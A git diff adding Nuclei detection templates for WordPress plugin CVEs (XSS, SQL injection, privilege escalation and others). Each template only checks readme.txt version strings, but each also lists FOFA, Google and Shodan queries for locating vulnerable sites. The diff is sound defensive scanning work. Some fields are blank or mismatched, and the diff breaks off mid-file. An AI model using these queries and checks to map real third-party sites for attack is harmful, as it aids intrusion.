+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/4dac404d-369c-4036-9c64-4afab021cbe8?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2024-53790
+ metadata:
+ fofa-query: "wp-content/plugins/lenxel-core/"
+ google-query: inurl:"/wp-content/plugins/lenxel-core/"
+ shodan-query: 'vuln:CVE-2024-53790'
+ tags: cve,wordpress,wp-plugin,lenxel-core,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/lenxel-core/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "lenxel-core"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53791-baff954ee6f7d9891e0773323ee016bc.yaml b/poc/cve/CVE-2024-53791-baff954ee6f7d9891e0773323ee016bc.yaml
new file mode 100644
index 0000000000..fb4e5dde91
--- /dev/null
+++ b/poc/cve/CVE-2024-53791-baff954ee6f7d9891e0773323ee016bc.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53791-baff954ee6f7d9891e0773323ee016bc
+
+info:
+ name: >
+ Lenxel Core <= 1.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Lenxel Core plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/48086577-09fc-4406-b13f-2091b50d1719?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53791
+ metadata:
+ fofa-query: "wp-content/plugins/lenxel-core/"
+ google-query: inurl:"/wp-content/plugins/lenxel-core/"
+ shodan-query: 'vuln:CVE-2024-53791'
+ tags: cve,wordpress,wp-plugin,lenxel-core,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/lenxel-core/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "lenxel-core"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53792-79e219d8701a1b03429312ab9d2266e2.yaml b/poc/cve/CVE-2024-53792-79e219d8701a1b03429312ab9d2266e2.yaml
new file mode 100644
index 0000000000..8af345c3d7
--- /dev/null
+++ b/poc/cve/CVE-2024-53792-79e219d8701a1b03429312ab9d2266e2.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53792-79e219d8701a1b03429312ab9d2266e2
+
+info:
+ name: >
+ Watu Quiz <= 3.4.1.2 - Authenticated (Contributor+) SQL Injection
+ author: topscoder
+ severity: low
+ description: >
+ The Watu Quiz plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 3.4.1.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/d3aa8d64-a0d1-49ad-ad92-e2a2bf066fe1?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 6.5
+ cve-id: CVE-2024-53792
+ metadata:
+ fofa-query: "wp-content/plugins/watu/"
+ google-query: inurl:"/wp-content/plugins/watu/"
+ shodan-query: 'vuln:CVE-2024-53792'
+ tags: cve,wordpress,wp-plugin,watu,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/watu/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "watu"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.4.1.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53793-d3005914f049e11801fdde85b91a6bf6.yaml b/poc/cve/CVE-2024-53793-d3005914f049e11801fdde85b91a6bf6.yaml
new file mode 100644
index 0000000000..94d7023254
--- /dev/null
+++ b/poc/cve/CVE-2024-53793-d3005914f049e11801fdde85b91a6bf6.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53793-d3005914f049e11801fdde85b91a6bf6
+
+info:
+ name: >
+ eDoc Easy Tables <= 1.29 - Cross-Site Request Forgery to SQL Injection
+ author: topscoder
+ severity: medium
+ description: >
+ The eDoc Easy Tables plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.29. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to inject arbitrary SQL queries via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/cd9d7d34-c03d-4791-94b4-9d2f502a7e37?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-53793
+ metadata:
+ fofa-query: "wp-content/plugins/Plugin/"
+ google-query: inurl:"/wp-content/plugins/Plugin/"
+ shodan-query: 'vuln:CVE-2024-53793'
+ tags: cve,wordpress,wp-plugin,Plugin,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/Plugin/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "Plugin"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.29')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-8485-fa09b925d5408de5c1804d1d70100e86.yaml b/poc/cve/CVE-2024-8485-fa09b925d5408de5c1804d1d70100e86.yaml
new file mode 100644
index 0000000000..cf7e975a44
--- /dev/null
+++ b/poc/cve/CVE-2024-8485-fa09b925d5408de5c1804d1d70100e86.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-8485-fa09b925d5408de5c1804d1d70100e86
+
+info:
+ name: >
+ REST API TO MiniProgram <= 4.7.1 - Unauthenticated Arbitrary User Email Update and Privilege Escalation via Account Takeover
+ author: topscoder
+ severity: critical
+ description: >
+ The REST API TO MiniProgram plugin for WordPress is vulnerable to privilege escalation via account takeovr in all versions up to, and including, 4.7.1 via the updateUserInfo() due to missing validation on the 'openid' user controlled key that determines what user will be updated. This makes it possible for unauthenticated attackers to update arbitrary user's accounts, including their email to a @weixin.com email, which can the be leveraged to reset the password of the user's account, including administrators.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b53066d3-2ff3-4460-896a-facd77455914?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2024-8485
+ metadata:
+ fofa-query: "wp-content/plugins/rest-api-to-miniprogram/"
+ google-query: inurl:"/wp-content/plugins/rest-api-to-miniprogram/"
+ shodan-query: 'vuln:CVE-2024-8485'
+ tags: cve,wordpress,wp-plugin,rest-api-to-miniprogram,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/rest-api-to-miniprogram/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "rest-api-to-miniprogram"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.7.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-9270-54f88c5ac9605569d0f73ca27f9f2362.yaml b/poc/cve/CVE-2024-9270-54f88c5ac9605569d0f73ca27f9f2362.yaml
new file mode 100644
index 0000000000..9ceebf2dc2
--- /dev/null
+++ b/poc/cve/CVE-2024-9270-54f88c5ac9605569d0f73ca27f9f2362.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-9270-54f88c5ac9605569d0f73ca27f9f2362
+
+info:
+ name: >
+ Lenxel Core for Lenxel(LNX) LMS <= 1.2.3 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload
+ author: topscoder
+ severity: low
+ description: >
+ The Lenxel Core for Lenxel(LNX) LMS plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.2.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/2e1d1283-3bd9-458e-81ca-9934b293415a?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-9270
+ metadata:
+ fofa-query: "wp-content/plugins/lenxel-core/"
+ google-query: inurl:"/wp-content/plugins/lenxel-core/"
+ shodan-query: 'vuln:CVE-2024-9270'
+ tags: cve,wordpress,wp-plugin,lenxel-core,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/lenxel-core/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "lenxel-core"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-9705-47f72a4a6e0c73ca568cee56cbebba9e.yaml b/poc/cve/CVE-2024-9705-47f72a4a6e0c73ca568cee56cbebba9e.yaml
new file mode 100644
index 0000000000..5bbd1df967
--- /dev/null
+++ b/poc/cve/CVE-2024-9705-47f72a4a6e0c73ca568cee56cbebba9e.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-9705-47f72a4a6e0c73ca568cee56cbebba9e
+
+info:
+ name: >
+ Ultimate Coming Soon & Maintenance <= 1.0.9 - Missing Authorization to Authenticated (Subscriber+) Template Name Update
+ author: topscoder
+ severity: low
+ description: >
+ The Ultimate Coming Soon & Maintenance plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'ucsm_update_template_name_lite' function in all versions up to, and including, 1.0.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change the name of the plugin's templates.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3bef108a-2c68-4347-bf53-559b2d877f6b?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-9705
+ metadata:
+ fofa-query: "wp-content/plugins/ultimate-coming-soon/"
+ google-query: inurl:"/wp-content/plugins/ultimate-coming-soon/"
+ shodan-query: 'vuln:CVE-2024-9705'
+ tags: cve,wordpress,wp-plugin,ultimate-coming-soon,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/ultimate-coming-soon/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "ultimate-coming-soon"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.9')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-9706-c93a0ea327575103c1bd40e9f8d3b76b.yaml b/poc/cve/CVE-2024-9706-c93a0ea327575103c1bd40e9f8d3b76b.yaml
new file mode 100644
index 0000000000..9642f637d8
--- /dev/null
+++ b/poc/cve/CVE-2024-9706-c93a0ea327575103c1bd40e9f8d3b76b.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-9706-c93a0ea327575103c1bd40e9f8d3b76b
+
+info:
+ name: >
+ Ultimate Coming Soon & Maintenance <= 1.0.9 - Missing Authorization to Unauthenticated Template Activation
+ author: topscoder
+ severity: high
+ description: >
+ The Ultimate Coming Soon & Maintenance plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ucsm_activate_lite_template_lite function in all versions up to, and including, 1.0.9. This makes it possible for unauthenticated attackers to change the template used for the coming soon / maintenance page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/a535eb7f-5ec7-4b3b-b46f-4f09434d04b6?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-9706
+ metadata:
+ fofa-query: "wp-content/plugins/ultimate-coming-soon/"
+ google-query: inurl:"/wp-content/plugins/ultimate-coming-soon/"
+ shodan-query: 'vuln:CVE-2024-9706'
+ tags: cve,wordpress,wp-plugin,ultimate-coming-soon,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/ultimate-coming-soon/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "ultimate-coming-soon"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.9')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-9769-04f41ad5af8b4a40298696fa6f430b08.yaml b/poc/cve/CVE-2024-9769-04f41ad5af8b4a40298696fa6f430b08.yaml
new file mode 100644
index 0000000000..1279dad8af
--- /dev/null
+++ b/poc/cve/CVE-2024-9769-04f41ad5af8b4a40298696fa6f430b08.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-9769-04f41ad5af8b4a40298696fa6f430b08
+
+info:
+ name: >
+ Video Gallery <= 2.4.1 - Authenticated (Administrator+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Video Gallery – Best WordPress YouTube Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.4.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b57c9e58-64a6-48e8-8ef6-25608e4131e6?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 4.4
+ cve-id: CVE-2024-9769
+ metadata:
+ fofa-query: "wp-content/plugins/gallery-videos/"
+ google-query: inurl:"/wp-content/plugins/gallery-videos/"
+ shodan-query: 'vuln:CVE-2024-9769'
+ tags: cve,wordpress,wp-plugin,gallery-videos,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/gallery-videos/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "gallery-videos"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.4.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-9866-7390d9a349370910408c5562d135bc89.yaml b/poc/cve/CVE-2024-9866-7390d9a349370910408c5562d135bc89.yaml
new file mode 100644
index 0000000000..712b5b3a8a
--- /dev/null
+++ b/poc/cve/CVE-2024-9866-7390d9a349370910408c5562d135bc89.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-9866-7390d9a349370910408c5562d135bc89
+
+info:
+ name: >
+ Event Tickets with Ticket Scanner <= 2.4.4 - Missing Authorization to Authenticated (Subscriber+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Event Tickets with Ticket Scanner plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'data' parameters in all versions up to, and including, 2.4.4 due to insufficient input sanitization and output escaping and missing authorization on the functionality to manage tickets. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This missing authorization aspect of this was patched in 2.4.1, while the Cross-Site Scripting was fully patched in 2.4.4.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/4dcf1133-d437-4f0a-b2cf-c91e0f6b6ca9?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 5.4
+ cve-id: CVE-2024-9866
+ metadata:
+ fofa-query: "wp-content/plugins/event-tickets-with-ticket-scanner/"
+ google-query: inurl:"/wp-content/plugins/event-tickets-with-ticket-scanner/"
+ shodan-query: 'vuln:CVE-2024-9866'
+ tags: cve,wordpress,wp-plugin,event-tickets-with-ticket-scanner,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/event-tickets-with-ticket-scanner/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "event-tickets-with-ticket-scanner"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.4.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-9872-0a2b107a70a05e6330557fd04ebc29f7.yaml b/poc/cve/CVE-2024-9872-0a2b107a70a05e6330557fd04ebc29f7.yaml
new file mode 100644
index 0000000000..f518e3494f
--- /dev/null
+++ b/poc/cve/CVE-2024-9872-0a2b107a70a05e6330557fd04ebc29f7.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-9872-0a2b107a70a05e6330557fd04ebc29f7
+
+info:
+ name: >
+ Online Booking & Scheduling Calendar for WordPress by vcita <= 4.5.1 - Authenticated (Subscriber+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Online Booking & Scheduling Calendar for WordPress by vcita plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the vcita_save_user_data_callback() function in all versions up to, and including, 4.5.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject malicious web scripts and update settings.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/963c2d10-692b-4447-8d0b-7ccc2e533f01?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 5.4
+ cve-id: CVE-2024-9872
+ metadata:
+ fofa-query: "wp-content/plugins/meeting-scheduler-by-vcita/"
+ google-query: inurl:"/wp-content/plugins/meeting-scheduler-by-vcita/"
+ shodan-query: 'vuln:CVE-2024-9872'
+ tags: cve,wordpress,wp-plugin,meeting-scheduler-by-vcita,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/meeting-scheduler-by-vcita/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "meeting-scheduler-by-vcita"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.5.1')
\ No newline at end of file
diff --git a/poc/header/simple-header-and-footer-2f2d13d68d1aa9ea670e89d2619faa2d.yaml b/poc/header/simple-header-and-footer-2f2d13d68d1aa9ea670e89d2619faa2d.yaml
new file mode 100644
index 0000000000..b5901f44a8
--- /dev/null
+++ b/poc/header/simple-header-and-footer-2f2d13d68d1aa9ea670e89d2619faa2d.yaml
@@ -0,0 +1,59 @@
+id: simple-header-and-footer-2f2d13d68d1aa9ea670e89d2619faa2d
+
+info:
+ name: >
+ Simple Header and Footer <= 1.0.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5b253378-beba-4e31-bf1f-0352fdf98ab5?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/simple-header-and-footer/"
+ google-query: inurl:"/wp-content/plugins/simple-header-and-footer/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,simple-header-and-footer,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/simple-header-and-footer/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "simple-header-and-footer"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.0')
\ No newline at end of file
diff --git a/poc/microsoft/cluevo-lms-ba6446ba5ad9a5f47c413928535e804a.yaml b/poc/microsoft/cluevo-lms-ba6446ba5ad9a5f47c413928535e804a.yaml
new file mode 100644
index 0000000000..dacca35397
--- /dev/null
+++ b/poc/microsoft/cluevo-lms-ba6446ba5ad9a5f47c413928535e804a.yaml
@@ -0,0 +1,59 @@
+id: cluevo-lms-ba6446ba5ad9a5f47c413928535e804a
+
+info:
+ name: >
+ CLUEVO LMS, E-Learning Platform <= 1.13.2 - Cross-Site Request Forgery to Module Deletion
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/2a3056d4-5ee9-4b31-9ef8-0e55f470ad23?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/cluevo-lms/"
+ google-query: inurl:"/wp-content/plugins/cluevo-lms/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,cluevo-lms,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cluevo-lms/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cluevo-lms"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.13.2')
\ No newline at end of file
diff --git a/poc/microsoft/pojo-forms-889210e907a32f3bac90ac14ce08d937.yaml b/poc/microsoft/pojo-forms-889210e907a32f3bac90ac14ce08d937.yaml
new file mode 100644
index 0000000000..27102fd203
--- /dev/null
+++ b/poc/microsoft/pojo-forms-889210e907a32f3bac90ac14ce08d937.yaml
@@ -0,0 +1,59 @@
+id: pojo-forms-889210e907a32f3bac90ac14ce08d937
+
+info:
+ name: >
+ Pojo Forms <= 1.4.7 - Authenticated (Subscriber+) Arbitrary Shortcode Execution via form_preview_shortcode
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/511ce6f6-aea3-4c37-8312-d6e5ff2fdf6f?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/pojo-forms/"
+ google-query: inurl:"/wp-content/plugins/pojo-forms/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,pojo-forms,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/pojo-forms/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "pojo-forms"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.7')
\ No newline at end of file
diff --git a/poc/open_redirect/eelv-redirection.yaml b/poc/open_redirect/eelv-redirection.yaml
new file mode 100644
index 0000000000..ba640f569d
--- /dev/null
+++ b/poc/open_redirect/eelv-redirection.yaml
@@ -0,0 +1,59 @@
+id: eelv-redirection
+
+info:
+ name: >
+ Simple Redirection <= 1.5 - Cross-Site Request Forgery to Arbitrary Site Redirect
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/0fa84344-8672-43e1-a430-094021f7366f?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/eelv-redirection/"
+ google-query: inurl:"/wp-content/plugins/eelv-redirection/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,eelv-redirection,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/eelv-redirection/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
